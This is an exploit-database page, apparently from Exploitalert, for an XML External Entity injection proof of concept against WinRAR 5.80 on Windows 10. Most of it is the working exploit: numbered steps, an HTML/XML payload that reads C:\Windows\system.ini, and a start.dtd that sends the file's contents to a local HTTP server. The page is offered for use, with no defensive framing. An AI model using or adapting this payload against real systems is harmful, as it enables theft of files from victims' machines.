Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-XXXX-XXXX | CWE-XX | Not specified | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Not specified | High | Remote | 2019-10-22 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 0.02192 | 0.50148 |
# Exploit Title: winrar External Entity Injection # Exploit Author: albalawi -s # https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit #https://twitter.com/test_app_______ poc video :https://www.youtube.com/watch?v=XpFvSHeVB7E # POC 1- python -m SimpleHTTPServer 8000 2- open winrar or any file.rar 3- help 4- help topics 5- Drag the html file to the window html file <htmlL> <body> <xml> <?xml version="1.0"?> <!DOCTYPE flavios [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd"> %dtd;]> <pwn>&send;</pwn> </xml> </body> </html> ============================== start.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>"> %all;
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.